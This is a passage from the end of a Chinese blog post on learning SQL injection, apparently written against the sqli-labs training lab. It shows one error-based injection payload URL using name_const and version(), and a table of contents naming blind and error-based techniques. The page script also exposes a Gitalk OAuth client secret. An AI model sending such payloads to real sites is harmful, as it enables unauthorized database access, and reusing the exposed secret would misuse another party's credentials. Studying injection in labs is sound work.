<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.247.91.228:84/Less-5/?id=1&apos; and 1=(select * from(select name_const(version(),1),name_const(version(),1))b) --+</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lego
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://legoc.gitee.io/2018/09/17/SQL注入学习/" title="SQL注入学习">http://legoc.gitee.io/2018/09/17/SQL注入学习/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/08/SSRF漏洞学习/" rel="next" title="SSRF漏洞学习">
                <i class="fa fa-chevron-left"></i> SSRF漏洞学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/09/17/pwniphone/" rel="prev" title="PWN by lego">
                PWN by lego <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
 <div id="gitalk-container"></div>
 
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png"
                alt="lego" />
            
              <p class="site-author-name" itemprop="name">lego</p>
              <p class="site-description motion-element" itemprop="description">从小菜鸡往大菜鸡成长的路上...</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">63</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#由题引入"><span class="nav-number">1.</span> <span class="nav-text">由题引入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#小结"><span class="nav-number">2.</span> <span class="nav-text">小结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#表结构"><span class="nav-number">2.1.</span> <span class="nav-text">表结构</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#函数"><span class="nav-number">2.2.</span> <span class="nav-text">函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注"><span class="nav-number">3.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#基于bool型的盲注"><span class="nav-number">3.1.</span> <span class="nav-text">基于bool型的盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#一些知识点"><span class="nav-number">3.2.</span> <span class="nav-text">一些知识点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#基于时间型盲注"><span class="nav-number">3.3.</span> <span class="nav-text">基于时间型盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#报错注入"><span class="nav-number">4.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#floor"><span class="nav-number">4.1.</span> <span class="nav-text">floor()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#extractvalue"><span class="nav-number">4.2.</span> <span class="nav-text">extractvalue</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#updatexml"><span class="nav-number">4.3.</span> <span class="nav-text">updatexml</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#name-const"><span class="nav-number">4.4.</span> <span class="nav-text">name_const</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lego</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '76aae4c57ee7f811d638',
          clientSecret: 'd6d32a0bf34087bf9ee31a1a74fd5bd72cc23c92',
          repo: 'legoc.github.io',
          owner: 'legoc',
          admin: ['legoc'],
          id: decodeURI(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>
	   
	   
	   




  





  

  

  

  
  

  

  

  

</body>
</html>
